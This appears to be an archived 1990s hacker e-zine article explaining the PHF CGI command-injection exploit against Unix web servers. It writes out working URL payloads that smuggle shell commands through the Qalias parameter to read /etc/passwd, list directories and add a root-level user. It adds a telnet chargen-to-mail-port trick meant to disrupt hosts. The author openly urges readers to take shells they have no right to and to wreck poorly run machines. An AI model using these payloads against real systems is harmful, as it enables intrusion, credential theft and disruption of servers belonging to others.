Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!

TUCoPS :: Networks :: phf.txt

Reality Check Network - PHF Web Hacking

       R  E  A  L  I  T  Y     C  H  E  C  K     N  E  T  W  O  R  K!       _
         From Issue #33 - PHF Web Hacking                                    
         by Dagashi                                                          
      Alright there kiddies, it's time to lightly dive into the world of    _
  how to obtain shells that do not rightfully belong to you and how to      _
  generally piss off people on the Internet.  As always, this is a well     _
  known bit on information (because no one in their right mind would give   _
  you an exploit to a system that no one else knows of), so I take no       _
  responsibility for whatever you do with it.                               _
      Since the majority of computers on the Internet are of UNIX decent,   _
  I will be mainly talk about their problems and such.  Now, the majority   _
  of us know that UNIX is full of holes and other problems no matter what   _
  revisions and patches are made, so this might not come as a big surprise  
  when I tell you there is a common exploit that will run any program on    
  your victim machine.  It is the PHF hack.  Though it is no big deal to    
  the majority of ISP's, most little companies do not have the time or      
  money to deal with all the problems of their operating systems.  Small    
  schools that are NOT technologically oriented, like high schools with     
  T1's and such would be a good example.  And so, this will work on some    
  of them.                                                                  
      All that is required to be done is to put this into the URL of        
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd    
      and you have a listing of the passwd file to use or abuse.  But the   
  PHF exploit can do more then just that (for those of you who will be      
  flaming me for writing such a simple article).  It can access any type    
  of program that is on the opposing computer and run it.                   
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/               
      will give you the directory listing of everything from the root of    
  the system.  From there, you can just alter it accordingly to have a      
  peek around the system to see what else you can learn.                    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20/bin            
      would show you every command that is available in the bin dir.  If    
  you slightly modified it, you would also be able to see the permissions   
  of the specific files.                                                    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/ls%20-la%20/bin      
      which can come in handy since, well, seeing as how you have root      
  permissions you now have a nice little bit of information about how the   
  system functions can use that to get even more access or information out  
  of it.                                                                    
      Or the best one of them all:                                          
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/adduser%20dagashi    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20dagashi%0    
      http://"server name"/cgi-bin/phf?Qalias=x%0a/bin/chuid%20root%500     
      Do that and you MIGHT have root access to the server by telnet.  Be   
  forewarned that this is an old hack and many servers would not have the   
  PHF script still running or have chmoded it to 000.  This can get you     
  into a bunch of trouble, so be careful.  As I said before, this is well   
  known and I wouldn't give it out to you unless most system                
  administrators (if they deserve the title then they know this hack by     
  heart) knew it as well.  But there are always those that don't deserve    
  the honor of the name, and to those, you have my full consent to fuck up  
  their machines to hell.                                                   
      For fun and excitement, type "telnet 19 | telnet  
  25" in Linux and watch life become a ball.                                

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2015 AOH